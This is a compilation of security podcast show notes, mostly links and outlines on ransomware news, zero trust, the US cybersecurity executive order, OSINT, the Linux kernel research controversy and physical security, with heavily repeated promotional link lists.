#SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Dan Borges - Author @1njection Buy the book on Amazon: https://www.amazon.com/Adversarial-Tradecraft-Cybersecurity-real-time-computer-ebook-dp-B0957LV496/dp/B0957LV496?_encoding=UTF8&me=&qid=&linkCode=ll1&tag=bdspod-20&linkId=8f2daf0b3563cbbc2cee6a2d2138149d&language=en_US&ref_=as_li_ss_tl https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/amp/ Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://twitter.com/DAlperovitch/status/1412033278081708034 https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/ https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128 https://en.wikipedia.org/wiki/Best_response https://labs.bishopfox.com/tech-blog/sliver https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164 Www.Globalcptc.org Virtual CCDC: How easy was the process working with Packt? Did they approach you or vice versa? 5 D's of Physical Security The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend. https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Dan Borges - Author @1njection Buy the book on Amazon: https://www.amazon.com/Adversarial-Tradecraft-Cybersecurity-real-time-computer-ebook-dp-B0957LV496/dp/B0957LV496?_encoding=UTF8&me=&qid=&linkCode=ll1&tag=bdspod-20&linkId=8f2daf0b3563cbbc2cee6a2d2138149d&language=en_US&ref_=as_li_ss_tl https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/amp/ Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://twitter.com/DAlperovitch/status/1412033278081708034 https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/ https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128 https://en.wikipedia.org/wiki/Best_response https://labs.bishopfox.com/tech-blog/sliver https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164 Www.Globalcptc.org Virtual CCDC: How easy was the process working with Packt? Did they approach you or vice versa? 5 D's of Physical Security The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend. https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Pihole setup Conference talk https://www.reuters.com/technology/microsoft-says-new-breach-discovered-probe-suspected-solarwinds-hackers-2021-06-25/ https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html https://www.ehackingnews.com/2021/06/attackers-pummelled-gaming-industry.html https://www.bleepingcomputer.com/news/microsoft/windows-11-wont-work-without-a-tpm-what-you-need-to-know/ https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows https://d3fend.mitre.org/ https://www.theregister.com/2021/06/15/zoll_defibrillator_dashboard_vulnerabilities/ https://twitter.com/Hexacorn https://www.ionos.com/digitalguide/server/configuration/winsxs-cleanup/ https://www.customink.com/fundraising/mental-health-hackers-7816 Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557 Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Ms. Berlin's conference report WWFH (reno, NV) Her next appearances will be at Defcon 2021 and BlueTeam Con 2021! https://www.infosecurity-magazine.com/news/amazon-prime-day-phishing-deluge/ https://www.ehackingnews.com/2021/06/threat-actors-use-google-drives-and.html https://www.kennasecurity.com/blog/vulnerability-score-on-its-own-is-useless/ https://portswigger.net/daily-swig/nist-charts-course-towards-more-secure-supply-chains-for-government-software https://github.blog/2021-04-29-call-for-feedback-policies-exploits-malware/ https://github.com/github/site-policy/pull/397 https://twitter.com/vm_call/status/1405937492642123782?s=20 https://thenewstack.io/cvss-struggles-to-remain-viable-in-the-era-of-cloud-native-computing/ ZOMG BUY SHIRTS HERE https://www.customink.com/fundraising/mental-health-hackers-7816 Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557 Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

EO from President Biden asked for a plan to create Zerotrust implementation in the next 90 days (well, 70ish days now… as of 23 May) https://twitter.com/SecuritySphynx/status/1390475868032618496 @securitySphynx "CIO: Zero Trust is the way…" What is the optimal configuration (read: easiest) zero trust config? Are there different ways to implement Zero Trust?` https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/ https://tulsaworld.com/opinion/columnists/zero-trust-security-assume-that-everyone-and-everything-on-the-internet-is-out-to-get/article_f6bdbfad-1aae-5063-8ac0-6a1faf5a244c.html https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/ https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf What is ZTA? Who are your users? What Devices in use? Device attestation/health checks Applications exist? Connections exist? Not just into/out of the traditional LAN network - do you understand dependencies of applications and databases and how the traffic flows? Where is the data/traffic? coming from? Going to? When is this activity occurring and what is expected? WHY: Need to balance the access to technical resources in a rapidly evolving and dynamic business landscape that ceases to exist within the confines of normal security perimeters. Mobile workforce - how much work can you get done without ever getting on the VPN? Blockers Technical Debt IT Hygiene Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality. Policy should exist to drive what the specifications of a baseline system, server, application, etc will be. Network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability ZTA is less useful if you're not doing basic patching, application updates, and allowing local admin on the system level). Legacy Systems: Not designed with this approach in mind, and often costly to modernize. Asset Management Where are your assets and how are they used? A "rough estimate" of endpoints is never good enough. What are you logging? What AREN'T you logging? User rights auditing Stale accounts, service accounts, HR Workflows for onboarding/offboarding Limitations of admin rights Local admin/password expiration issues for sales/travelling employees Human resources/talent Politics: Getting support/$$$/Buy-in for retrofitting applications that are "working just fine" is a huge political/business hurdle. Where to go from here: SaaS/PaaS/etc offerings What can you move from traditional off-prem solutions to cloud-based services (more up to date, regularly reviewed for security vulnerabilities, offloading responsibility of maintenance, SSO capabilities) AAA requirements MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy. Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad stroke permissions is always the right choice. Identify data owners, make them responsible for RBAC development with technical departments. Quantify risk associated with mishandled resources for crown jewels (see previous section on politics). Change control around permissions, access Security as an active participant in the development/acquisition of new products, software, services, or organizations Like remodeling a house, it is much easier to build security into the process than hire someone to retrofit it later.. What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM. Manage the Endpoint: Stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, out of traditional "control". Real time, actionable data and capabilities are critical to remediation and progress. Asset Inventory (again)... Then… HIDS/Firewall Patch Applocker/Application Controls Lather, rinse, repeat. DLP Classification It's hard, it's time-consuming, and it requires a LOT of support for business unit owners. Capture metrics, then set KPIs and regular check ins to reduce MTTP/MTTR/MTTD Would you like to know more? https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model

Full show notes are available here: https://docs.google.com/document/d/14dCpXeQ520IcZC3m007zVPhlIPXKgfv0LkqVnbDx0fc/edit?usp=sharing EO from President Biden asked for a plan to create Zerotrust implementation in the next 90 days (well, 70ish days now… as of 23 May)https://twitter.com/SecuritySphynx/status/1390475868032618496 @securitySphynx "CIO: Zero Trust is the way…" What is the optimal configuration (read: easiest) zero trust config? Are there different ways to implement Zero Trust?` https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/ https://tulsaworld.com/opinion/columnists/zero-trust-security-assume-that-everyone-and-everything-on-the-internet-is-out-to-get/article_f6bdbfad-1aae-5063-8ac0-6a1faf5a244c.html https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/ https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf What is ZTA Who are your users? Devices in use? Device attestation/health checks Applications exist? Not just into/out of the traditional LAN network - do you understand dependencies of applications and databases and how the traffic flows? Connections exist? What Where is the data/traffic? coming from? Going to? When is this activity occurring and what is expected? WHY: Need to balance the access to technical resources in a rapidly evolving and dynamic business landscape that ceases to exist within the confines of normal security perimeters. Mobile workforce - how much work can you get done without ever getting on the VPN? Blockers Technical Debt IT Hygiene Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality. Policy should exist to drive what the specifications of a baseline system, server, application, etc will be. Network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability ZTA is less useful if you're not doing basic patching, application updates, and allowing local admin on the system level). Not designed with this approach in mind, and often costly to modernize. Legacy Systems: Where are your assets and how are they used? A "rough estimate" of endpoints is never good enough. What are you logging? What AREN'T you logging? Asset Management Stale accounts, service accounts, HR Workflows for onboarding/offboarding Limitations of admin rights Local admin/password expiration issues for sales/travelling employees User rights auditing Human resources/talent Politics: Getting support/$$$/Buy-in for retrofitting applications that are "working just fine" is a huge political/business hurdle. SaaS/PaaS/etc offerings What can you move from traditional off-prem solutions to cloud-based services (more up to date, regularly reviewed for security vulnerabilities, offloading responsibility of maintenance, SSO capabilities) Where to go from here: AAA requirements MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy. Identify data owners, make them responsible for RBAC development with technical departments. Quantify risk associated with mishandled resources for crown jewels (see previous section on politics). Change control around permissions, access Security as an active participant in the development/acquisition of new products, software, services, or organizations Like remodeling a house, it is much easier to build security into the process than hire someone to retrofit it later.. Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad stroke permissions is always the right choice. What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM. Asset Inventory (again)... Then… HIDS/Firewall Patch Applocker/Application Controls Lather, rinse, repeat. It's hard, it's time-consuming, and it requires a LOT of support for business unit owners. DLP Classification Capture metrics, then set KPIs and regular check ins to reduce MTTP/MTTR/MTTD Manage the Endpoint: Stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, out of traditional "control". Real time, actionable data and capabilities are critical to remediation and progress. Would you like to know more? https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes

part 2: CTF OSINT discussion How people will give additional information, even if they aren't receiving points for it. Gamifying and motivating people to 'do the right thing', like offering a chance to win a lottery for a covid vaccine, or free sports tickets to get a shot, or gift cards when reporting phishes. Joe Gray @C_3PJoe OSINTION https://theosintion.com New book… ship date? How to get it? https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/ https://nostarch.com/practical-social-engineering "Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers." — Ian Barker, BetaNews Story (Bryan: found my shipmate from the Navy) Gathering OSINT (what is ethically too far?) OSINT heartbeat https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/ https://hunter.io/ https://halalgoogling.com/ The OSINTion Discord: https://discord.gg/p78TTGa stick/carrot interactions https://www.aamc.org/news-insights/dollars-doughnuts-will-incentives-motivate-covid-19-vaccination How do we motivate or create the desire? Ohio Covid lottery - https://www.dispatch.com/story/news/2021/05/13/ohio-covid-vaccine-lottery-heres-how-you-can-win/5071370001/ Art sessions with Ms. Berlin Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Elizabeth Wharton: @lawyerliz on Twitter Executive Order: (https://www.americanbar.org/groups/public_education/publications/teaching-legal-docs/what-is-an-executive-order-/) "An executive order is a signed, written, and published directive from the President of the United States that manages operations of the federal government. They are numbered consecutively, so executive orders may be referenced by their assigned number, or their topic. Other presidential documents are sometimes similar to executive orders in their format, formality, and issue, but have different purposes. Proclamations, which are also signed and numbered consecutively, communicate information on holidays, commemorations, federal observances, and trade. Administrative orders—e.g. memos, notices, letters, messages—are not numbered, but are still signed, and are used to manage administrative matters of the federal government. All three types of presidential documents—executive orders, proclamations, and certain administrative orders—are published in the Federal Register, the daily journal of the federal government that is published to inform the public about federal regulations and actions. They are also catalogued by the National Archives as official documents produced by the federal government. Both executive orders and proclamations have the force of law, much like regulations issued by federal agencies, so they are codified under Title 3 of the Code of Federal Regulations, which is the formal collection of all of the rules and regulations issued by the executive branch and other federal agencies. Executive orders are not legislation; they require no approval from Congress, and Congress cannot simply overturn them. Congress may pass legislation that might make it difficult, or even impossible, to carry out the order, such as removing funding. Only a sitting U.S. President may overturn an existing executive order by issuing another executive order to that effect." https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/ Another Review: https://www.atlanticcouncil.org/blogs/new-atlanticist/markup-our-experts-annotate-bidens-new-executive-order-on-cybersecurity/ https://www.insurancejournal.com/news/national/2021/05/21/615373.htm Within 60 days of the date of this order, the head of each agency shall: (i) update existing agency plans to prioritize resources for the adoption and use of cloud technology as outlined in relevant OMB guidance; (ii) develop a plan to implement Zero Trust Architecture, which shall incorporate, as appropriate, the migration steps that the National Institute of Standards and Technology (NIST) within the Department of Commerce has outlined in standards and guidance, describe any such steps that have already been completed, identify activities that will have the most immediate security impact, and include a schedule to implement them; and Within 180 days of the date of this order, agencies shall adopt multi-factor authentication and encryption for data at rest and in transit, to the maximum extent consistent with Federal records laws and other applicable laws. Within 90 days of the date of this order, the Secretary of Homeland Security acting through the Director of CISA, in consultation with the Attorney General, the Director of the FBI, and the Administrator of General Services acting through the Director of FedRAMP, shall establish a framework to collaborate on cybersecurity and incident response activities related to FCEB cloud technology, in order to ensure effective information sharing among agencies and between agencies and CSPs. SBOM! Dr. Allan Friedman on BrakeSec https://brakeingsecurity.com/2020-031-allan-friedman-sbom-software-transparency-and-knowing-how-the-sausage-is-made http://brakeingsecurity.com/2020-032-dr-allan-friedman-sbom-software-transparency-and-how-the-sausage-is-made-part-2 providing a purchaser a Software Bill of Materials (SBOM) for each product directly or by publishing it on a public website; (viii) participating in a vulnerability disclosure program that includes a reporting and disclosure process; (ix) attesting to conformity with secure software development practicesWithin 270 days of the date of this order, the Secretary of Commerce acting through the Director of NIST, in coordination with the Chair of the Federal Trade Commission (FTC) and representatives of other agencies as the Director of NIST deems appropriate, shall identify IoT cybersecurity criteria for a consumer labeling program, and shall consider whether such a consumer labeling program may be operated in conjunction with or modeled after any similar existing government programs consistent with applicable law. The criteria shall reflect increasingly comprehensive levels of testing and assessment that a product may have undergone, and shall use or be compatible with existing labeling schemes that manufacturers use to inform consumers about the securi

Joe Gray @C_3PJoe OSINTION https://theosintion.com New book… ship date? How to get it? https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/ https://nostarch.com/practical-social-engineering "Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers." — Ian Barker, BetaNews Story (Bryan: found my shipmate from the Navy) Gathering OSINT (what is ethically too far?) OSINT heartbeat https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/ https://hunter.io/ https://halalgoogling.com/ The OSINTion Discord: https://discord.gg/p78TTGa Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Updates to the Linux kernel controversy: https://lwn.net/SubscriberLink/854645/334317047842b6c3/ @pageinSec on Twitter Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/ Spencer Geitzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments https://en.wikipedia.org/wiki/Milgram_experiment https://lore.kernel.org/lkml/[email protected]/ https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021 https://www.labbott.name/blog/2021/04/21/breakingtrust.html Seems like a number of patches were added (~190) and each had to be reviewed to ensure badness https://twitter.com/UMNComputerSci/status/1384948683821694976 response to researchers Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/ https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/ https://twitter.com/SarahJamieLewis/status/1384871385537908736 @sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608 https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1 https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1 https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.) https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)"Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract." https://github.com/QiushiWu/qiushiwu.github.io NSF Grant application (thank you Page!) https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp Might be more recent - Human Subjects | NSF - National Science Foundation The researchers issued an apology today 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/ *thanks to Zach Whittacker's security mailing list..* https://twitter.com/argvee Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset? Co-author of : https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127 Introduction of bugs (meaningful or otherwise) caused more work for devs. Revert: https://lkml.org/lkml/2021/4/21/454 Quick overview of using deception in research from Duke's IRB: Using Deception in Research | Institutional Review Board (duke.edu) Is this better? Where's the line on this? https://www.bleepingcomputer.com/news/security/emotet-malware-nukes-itself-today-from-all-infected-computers-worldwide/

@pageinSec on Twitter Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/ Spencer Geitzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments https://en.wikipedia.org/wiki/Milgram_experiment https://lore.kernel.org/lkml/[email protected]/ https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021 https://www.labbott.name/blog/2021/04/21/breakingtrust.html Seems like a number of patches were added (~190) and each had to be reviewed https://twitter.com/UMNComputerSci/status/1384948683821694976 response to researchers Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/ https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/ https://twitter.com/SarahJamieLewis/status/1384871385537908736 @sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608 https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1 https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1 https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.) https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)"Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract." https://github.com/QiushiWu/qiushiwu.github.io NSF Grant application (thank you Page!) https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp Might be more recent - Human Subjects | NSF - National Science Foundation The researchers issued an apology today 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/ *thanks to Zach Whittacker's security mailing list..* https://twitter.com/argvee Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset? Co-author of : https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127 Introduction of bugs (meaningful or otherwise) caused more work for devs. Revert list of 190 patches (threaded): https://lkml.org/lkml/2021/4/21/454 Quick overview of using deception in research from Duke's IRB: Using Deception in Research | Institutional Review Board (duke.edu) Is this better? Where's the line on this? https://www.bleepingcomputer.com/news/security/emotet-malware-nukes-itself-today-from-all-infected-computers-worldwide/

Chrome Blocks Port 10080 to Prevent Slipstreaming Hacks - E Hacking News - Latest Hacker News and IT Security News https://www.reddit.com/r/netsec/comments/jlu3cf/nat_slipstreaming/ Samy Kamkar - NAT Slipstreaming v2.0 Slack and Discord are Being Hijacked by Hackers to Distribute Malware - E Hacking News - Latest Hacker News and IT Security News Texan's alleged Amazon bombing effort fizzles: Militia man wanted to take out 'about 70 per cent of the internet' • The Register Pwn2Own 2021: Hackers Offered $200,000 for Zoom, Microsoft Teams Exploits | SecurityWeek.Com https://twitter.com/k8em0/status/1381258155485585409 https://twitter.com/alisaesage/status/1380797761801445376?s=20 infosecCampout 2021 Hackers Who Paint WWHF Way west https://pastebin.com/2eYY6trD (for training students) @lintile @infosecroleplay

Reparations.tech *Public Safety Coordinators-Field Operations (Road Incidents)-Specialized Buildings (The Library, Medical Facilities, CCR)*Public Safety OfficersA. Discuss Training-SOP Creation *SOPs are very custom and dependent on the organization. There are no "NIST" standards. [IN CYBER: Frameworks for Physical Security ---> ] *Think on your feet, many plans often get thrown out the window. *Creating policies due to unforeseen incidents -Physical Security Assessments: Fire Panels, AED, Roof Accesses *The Checklist: Baseline configuration of the operations for a building *Locksmith Troubleshooting *Lack of Funding (Historically) + Ways to Address this In-House Talking to Strangers: What We Should Know about the People We Don't Know: Gladwell, Malcolm: 9780316478526: Amazon.com: Books Situational Awareness(?) "What is Situational Awareness?" -There's a lack of good training to discuss their own physical security *Ph.Ds leaving car doors wide open, blaming safety officers when they mess up *Common sense is not so common *Scenarios don't always cover every event *Dead bodies, car accidents, people streaking (lol), medical issues -Policies can be simple, like opening a car door *Need to vet whether the person is actually their car Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security? Summary of the Clery Act | Clery Center"The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics. In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety." C.Real Life examples of Physical Security Blunders Death of Elisa Lam - Wikipedia Crime Scene: The Vanishing at the Cecil Hotel - Wikipedia STORY: Person called a SOC, asked to get into their car ( but not their vehicle) Performing multiple sweeps of common areas to prevent squatting Staff "tripping" alarms Deceased Faculty + No Sleeping Policy Working as a Team *Escalation Management *Police are often increase tensions when de-escalation is needed. *Working as a team *Locksmith Team + Public Safety Team *Looking for talent in unexpected places to transfer over to CyberSecurity (Build the Bridge) Lockpicking Community: [insert folks on twitter / youtube] companies heading back to work What should IT or Security think about for your businesses that may not have had people in for 6-9 months? If companies don't have cameras or physical controls, should they think about looking at improving? Connect with 